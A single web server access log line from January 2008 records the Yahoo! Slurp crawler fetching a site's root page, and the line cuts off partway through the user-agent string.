74.6.19.200 - - [25/Jan/2008:19:05:43 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slur